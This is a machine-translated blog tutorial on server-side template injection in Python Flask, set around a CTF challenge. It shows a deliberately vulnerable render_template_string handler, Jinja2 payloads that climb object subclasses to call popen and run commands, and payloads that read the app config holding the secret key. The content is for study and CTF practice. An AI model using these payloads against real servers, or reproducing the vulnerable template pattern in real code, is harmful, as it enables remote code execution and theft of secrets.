当前位置:网站首页>SSTI template injection explanation and real problem practice
SSTI template injection explanation and real problem practice
2022-07-06 03:47:00 【Advertising fever】
0x00 SSTI
1. What is? SSTI Inject ?
SSTI Template Injection (Server-Side Template Injection), Through the interface with the server-side template Input output interaction , In the case of lax filtering , Construct malicious input data , So as to read files or getshell Purpose , at present CTF common SSTI In question , Most of them are exams python Of .
2. Causes and utilization conditions
The website processes the output pages by the data and template framework , Our data will not change in the database , But the template of the picture can be converted in various ways , Different templates can give people different visual feelings , But when the template has controllable parameter variables or the template code has the debugging function of the template , May lead to ssti Template Injection , This injection exists for most script types . It's common for python Of CTF More test sites
3. What are the hazards ?
It can cause file reading , Command execution , Code execution, etc
paylaod Analytical reference :
0x01 Case understanding SSTI
Sensitive function phrases :
flask
render_template_string
Python Case study :
from flask import Flask
from flask import request
from flask import config
from flask import render_template_string
app = Flask(__name__)
app.config['SECRET_KEY'] = "flag{SSTI_123456}"
@app.route('/')
def hello_world():
return 'Hello World!'
@app.errorhandler(404)
def page_not_found(e):
template = '''
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3> #%s obtain 404_url Parameter the contents of the following fields , So as to input controllable variable injection
</div>
{%% endblock %%}
''' % (request.args.get('404_url'))
return render_template_string(template), 404
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
Can be python Script execution , Injection of being
adopt payload type , can RCE Read files and operate the machine
os._wrap_close In the class popen.
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__.popen('whoami').read()
0x02 CTF Case study
https://buuoj.cn/
Title Page :
structure 2-2 perform , That there is ssti Injection execution
View all global variables , Reference global variables
Use global variables to get the following config value
url_for() Function is used to build the specified function of operation URL
get_flashed_messages() The function is to get the passed data
Get global variables
/shrine/{
{url_for.__globals__}}
or
/shrine/{
{get_flashed_messages.__globals__}}
Use the current global variable to read :
/shrine/{
{url_for.__globals__['current_app'].config}}
or
/shrine/{
{get_flashed_messages.__globals__['current_app'].config}}
Add : pyc Decompile knowledge points
pyc It is also a form of script encapsulation , Be similar to
aspx:DLL file
java:.class/jar/war file
pyc Is a decompilable package , There are also those that are difficult to decompile pyd Wait for the documents
pyc Decompile reference website :
Decompile platform :
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
decompiler :https://github.com/wibiti/uncompyle2
边栏推荐
- Remote Sensing Image Super-resolution and Object Detection: Benchmark and State of the Art
- Restful style
- Cubemx transplantation punctual atom LCD display routine
- Multi project programming minimalist use case
- Pointer for in-depth analysis (problem solution)
- Edcircles: a real time circle detector with a false detection control translation
- Svg drag point crop image JS effect
- Why do you want to start pointer compression?
- Ybtoj coloring plan [tree chain dissection, segment tree, tarjan]
- cookie,session,Token 这些你都知道吗?
猜你喜欢
KS008基于SSM的新闻发布系统
JS music online playback plug-in vsplayaudio js
教你用Pytorch搭建一个自己的简单的BP神经网络( 以iris数据集为例 )
【按键消抖】基于FPGA的按键消抖模块开发
【SLAM】lidar-camera外参标定(港大MarsLab)无需二维码标定板
C#(二十七)之C#窗体应用
Facebook and other large companies have leaked more than one billion user data, and it is time to pay attention to did
遥感图像超分辨率论文推荐
Align items and align content in flex layout
3.1 rtthread 串口设备(V1)详解
随机推荐
Ks008 SSM based press release system
ESBuild & SWC浅谈: 新一代构建工具
MySQL reads missing data from a table in a continuous period of time
JS music online playback plug-in vsplayaudio js
2.1 rtthread pin设备详解
How to modify field constraints (type, default, null, etc.) in a table
BUAA计算器(表达式计算-表达式树实现)
pytorch加载数据
Pytoch foundation - (1) initialization of tensors
登录mysql输入密码时报错,ERROR 1045 (28000): Access denied for user ‘root‘@‘localhost‘ (using password: NO/YES
Facebook等大厂超十亿用户数据遭泄露,早该关注DID了
WPF效果第一百九十一篇之框选ListBox
Plus d'un milliard d'utilisateurs de grandes entreprises comme Facebook ont été compromis, il est temps de se concentrer sur le did
Align items and align content in flex layout
2.2 fonctionnement stm32 GPIO
Alibaba testers use UI automated testing to achieve element positioning
Indicator system of KQI and KPI
潘多拉 IOT 开发板学习(HAL 库)—— 实验9 PWM输出实验(学习笔记)
[Massey] Massey font format and typesetting requirements
C#(二十七)之C#窗体应用